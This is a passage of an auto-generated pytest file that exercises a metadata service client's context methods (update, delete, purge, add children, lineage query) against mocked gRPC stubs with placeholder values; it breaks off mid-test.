# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_context), "__call__") as call:
client.update_context()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.UpdateContextRequest()
@pytest.mark.asyncio
async def test_update_context_async(
transport: str = "grpc_asyncio", request_type=metadata_service.UpdateContextRequest
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_context), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
gca_context.Context(
name="name_value",
display_name="display_name_value",
etag="etag_value",
parent_contexts=["parent_contexts_value"],
schema_title="schema_title_value",
schema_version="schema_version_value",
description="description_value",
)
)
response = await client.update_context(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.UpdateContextRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gca_context.Context)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.etag == "etag_value"
assert response.parent_contexts == ["parent_contexts_value"]
assert response.schema_title == "schema_title_value"
assert response.schema_version == "schema_version_value"
assert response.description == "description_value"
@pytest.mark.asyncio
async def test_update_context_async_from_dict():
await test_update_context_async(request_type=dict)
def test_update_context_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.UpdateContextRequest()
request.context.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_context), "__call__") as call:
call.return_value = gca_context.Context()
client.update_context(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"context.name=name_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_update_context_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.UpdateContextRequest()
request.context.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_context), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gca_context.Context())
await client.update_context(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"context.name=name_value",
) in kw["metadata"]
def test_update_context_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_context), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gca_context.Context()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.update_context(
context=gca_context.Context(name="name_value"),
update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].context
mock_val = gca_context.Context(name="name_value")
assert arg == mock_val
arg = args[0].update_mask
mock_val = field_mask_pb2.FieldMask(paths=["paths_value"])
assert arg == mock_val
def test_update_context_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.update_context(
metadata_service.UpdateContextRequest(),
context=gca_context.Context(name="name_value"),
update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
)
@pytest.mark.asyncio
async def test_update_context_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_context), "__call__") as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gca_context.Context())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.update_context(
context=gca_context.Context(name="name_value"),
update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].context
mock_val = gca_context.Context(name="name_value")
assert arg == mock_val
arg = args[0].update_mask
mock_val = field_mask_pb2.FieldMask(paths=["paths_value"])
assert arg == mock_val
@pytest.mark.asyncio
async def test_update_context_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.update_context(
metadata_service.UpdateContextRequest(),
context=gca_context.Context(name="name_value"),
update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
)
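
# NOTE (editorial sketch): update_mask in the tests above is a standard
# google.protobuf FieldMask; "paths_value" is only a placeholder. In real
# calls the paths name the Context fields to overwrite, e.g.:
def test_update_context_field_mask_paths():
    mask = field_mask_pb2.FieldMask(paths=["description", "display_name"])
    assert list(mask.paths) == ["description", "display_name"]
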
@pytest.mark.parametrize(
"request_type",
[
metadata_service.DeleteContextRequest,
dict,
],
)
def test_delete_context(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_context), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/spam")
response = client.delete_context(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.DeleteContextRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
def test_delete_context_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_context), "__call__") as call:
client.delete_context()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.DeleteContextRequest()
@pytest.mark.asyncio
async def test_delete_context_async(
transport: str = "grpc_asyncio", request_type=metadata_service.DeleteContextRequest
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_context), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/spam")
)
response = await client.delete_context(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.DeleteContextRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
@pytest.mark.asyncio
async def test_delete_context_async_from_dict():
await test_delete_context_async(request_type=dict)
def test_delete_context_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.DeleteContextRequest()
request.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_context), "__call__") as call:
call.return_value = operations_pb2.Operation(name="operations/op")
client.delete_context(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=name_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_delete_context_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.DeleteContextRequest()
request.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_context), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/op")
)
await client.delete_context(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=name_value",
) in kw["metadata"]
def test_delete_context_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_context), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/op")
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.delete_context(
name="name_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
def test_delete_context_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.delete_context(
metadata_service.DeleteContextRequest(),
name="name_value",
)
@pytest.mark.asyncio
async def test_delete_context_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_context), "__call__") as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            operations_pb2.Operation(name="operations/spam")
        )
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.delete_context(
name="name_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_delete_context_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.delete_context(
metadata_service.DeleteContextRequest(),
name="name_value",
)
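
# NOTE (editorial sketch): delete_context returns a long-running operation,
# which is why the tests above only assert isinstance(response, future.Future).
# Assuming the standard google.api_core operation surface, production code
# blocks on completion like this:
#
#     operation = client.delete_context(name="name_value")
#     operation.result(timeout=300)  # raises on failure
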
@pytest.mark.parametrize(
"request_type",
[
metadata_service.PurgeContextsRequest,
dict,
],
)
def test_purge_contexts(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_contexts), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/spam")
response = client.purge_contexts(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.PurgeContextsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
def test_purge_contexts_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_contexts), "__call__") as call:
client.purge_contexts()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.PurgeContextsRequest()
@pytest.mark.asyncio
async def test_purge_contexts_async(
transport: str = "grpc_asyncio", request_type=metadata_service.PurgeContextsRequest
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_contexts), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/spam")
)
response = await client.purge_contexts(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.PurgeContextsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
@pytest.mark.asyncio
async def test_purge_contexts_async_from_dict():
await test_purge_contexts_async(request_type=dict)
def test_purge_contexts_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.PurgeContextsRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_contexts), "__call__") as call:
call.return_value = operations_pb2.Operation(name="operations/op")
client.purge_contexts(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_purge_contexts_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.PurgeContextsRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_contexts), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/op")
)
await client.purge_contexts(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
def test_purge_contexts_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_contexts), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/op")
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.purge_contexts(
parent="parent_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
def test_purge_contexts_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.purge_contexts(
metadata_service.PurgeContextsRequest(),
parent="parent_value",
)
@pytest.mark.asyncio
async def test_purge_contexts_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_contexts), "__call__") as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            operations_pb2.Operation(name="operations/spam")
        )
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.purge_contexts(
parent="parent_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_purge_contexts_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.purge_contexts(
metadata_service.PurgeContextsRequest(),
parent="parent_value",
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.AddContextArtifactsAndExecutionsRequest,
dict,
],
)
def test_add_context_artifacts_and_executions(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.add_context_artifacts_and_executions), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_service.AddContextArtifactsAndExecutionsResponse()
response = client.add_context_artifacts_and_executions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.AddContextArtifactsAndExecutionsRequest()
# Establish that the response is the type that we expect.
assert isinstance(
response, metadata_service.AddContextArtifactsAndExecutionsResponse
)
def test_add_context_artifacts_and_executions_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.add_context_artifacts_and_executions), "__call__"
) as call:
client.add_context_artifacts_and_executions()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.AddContextArtifactsAndExecutionsRequest()
@pytest.mark.asyncio
async def test_add_context_artifacts_and_executions_async(
transport: str = "grpc_asyncio",
request_type=metadata_service.AddContextArtifactsAndExecutionsRequest,
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.add_context_artifacts_and_executions), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_service.AddContextArtifactsAndExecutionsResponse()
)
response = await client.add_context_artifacts_and_executions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.AddContextArtifactsAndExecutionsRequest()
# Establish that the response is the type that we expect.
assert isinstance(
response, metadata_service.AddContextArtifactsAndExecutionsResponse
)
@pytest.mark.asyncio
async def test_add_context_artifacts_and_executions_async_from_dict():
await test_add_context_artifacts_and_executions_async(request_type=dict)
def test_add_context_artifacts_and_executions_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.AddContextArtifactsAndExecutionsRequest()
request.context = "context_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.add_context_artifacts_and_executions), "__call__"
) as call:
call.return_value = metadata_service.AddContextArtifactsAndExecutionsResponse()
client.add_context_artifacts_and_executions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"context=context_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_add_context_artifacts_and_executions_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.AddContextArtifactsAndExecutionsRequest()
request.context = "context_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.add_context_artifacts_and_executions), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_service.AddContextArtifactsAndExecutionsResponse()
)
await client.add_context_artifacts_and_executions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"context=context_value",
) in kw["metadata"]
def test_add_context_artifacts_and_executions_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.add_context_artifacts_and_executions), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_service.AddContextArtifactsAndExecutionsResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.add_context_artifacts_and_executions(
context="context_value",
artifacts=["artifacts_value"],
executions=["executions_value"],
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].context
mock_val = "context_value"
assert arg == mock_val
arg = args[0].artifacts
mock_val = ["artifacts_value"]
assert arg == mock_val
arg = args[0].executions
mock_val = ["executions_value"]
assert arg == mock_val
def test_add_context_artifacts_and_executions_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.add_context_artifacts_and_executions(
metadata_service.AddContextArtifactsAndExecutionsRequest(),
context="context_value",
artifacts=["artifacts_value"],
executions=["executions_value"],
)
@pytest.mark.asyncio
async def test_add_context_artifacts_and_executions_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.add_context_artifacts_and_executions), "__call__"
) as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            metadata_service.AddContextArtifactsAndExecutionsResponse()
        )
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.add_context_artifacts_and_executions(
context="context_value",
artifacts=["artifacts_value"],
executions=["executions_value"],
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].context
mock_val = "context_value"
assert arg == mock_val
arg = args[0].artifacts
mock_val = ["artifacts_value"]
assert arg == mock_val
arg = args[0].executions
mock_val = ["executions_value"]
assert arg == mock_val
@pytest.mark.asyncio
async def test_add_context_artifacts_and_executions_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.add_context_artifacts_and_executions(
metadata_service.AddContextArtifactsAndExecutionsRequest(),
context="context_value",
artifacts=["artifacts_value"],
executions=["executions_value"],
)
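# Either a request object or flattened keyword fields may be supplied on
# their own; the ValueError above guards the ambiguous combination of both.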
@pytest.mark.parametrize(
"request_type",
[
metadata_service.AddContextChildrenRequest,
dict,
],
)
def test_add_context_children(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.add_context_children), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_service.AddContextChildrenResponse()
response = client.add_context_children(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.AddContextChildrenRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, metadata_service.AddContextChildrenResponse)
def test_add_context_children_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.add_context_children), "__call__"
) as call:
client.add_context_children()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.AddContextChildrenRequest()
@pytest.mark.asyncio
async def test_add_context_children_async(
transport: str = "grpc_asyncio",
request_type=metadata_service.AddContextChildrenRequest,
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.add_context_children), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_service.AddContextChildrenResponse()
)
response = await client.add_context_children(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.AddContextChildrenRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, metadata_service.AddContextChildrenResponse)
@pytest.mark.asyncio
async def test_add_context_children_async_from_dict():
await test_add_context_children_async(request_type=dict)
def test_add_context_children_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.AddContextChildrenRequest()
request.context = "context_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.add_context_children), "__call__"
) as call:
call.return_value = metadata_service.AddContextChildrenResponse()
client.add_context_children(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"context=context_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_add_context_children_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.AddContextChildrenRequest()
request.context = "context_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.add_context_children), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_service.AddContextChildrenResponse()
)
await client.add_context_children(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"context=context_value",
) in kw["metadata"]
def test_add_context_children_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.add_context_children), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_service.AddContextChildrenResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.add_context_children(
context="context_value",
child_contexts=["child_contexts_value"],
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].context
mock_val = "context_value"
assert arg == mock_val
arg = args[0].child_contexts
mock_val = ["child_contexts_value"]
assert arg == mock_val
def test_add_context_children_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.add_context_children(
metadata_service.AddContextChildrenRequest(),
context="context_value",
child_contexts=["child_contexts_value"],
)
@pytest.mark.asyncio
async def test_add_context_children_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.add_context_children), "__call__"
) as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            metadata_service.AddContextChildrenResponse()
        )
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.add_context_children(
context="context_value",
child_contexts=["child_contexts_value"],
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].context
mock_val = "context_value"
assert arg == mock_val
arg = args[0].child_contexts
mock_val = ["child_contexts_value"]
assert arg == mock_val
@pytest.mark.asyncio
async def test_add_context_children_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.add_context_children(
metadata_service.AddContextChildrenRequest(),
context="context_value",
child_contexts=["child_contexts_value"],
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.QueryContextLineageSubgraphRequest,
dict,
],
)
def test_query_context_lineage_subgraph(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.query_context_lineage_subgraph), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = lineage_subgraph.LineageSubgraph()
response = client.query_context_lineage_subgraph(request)
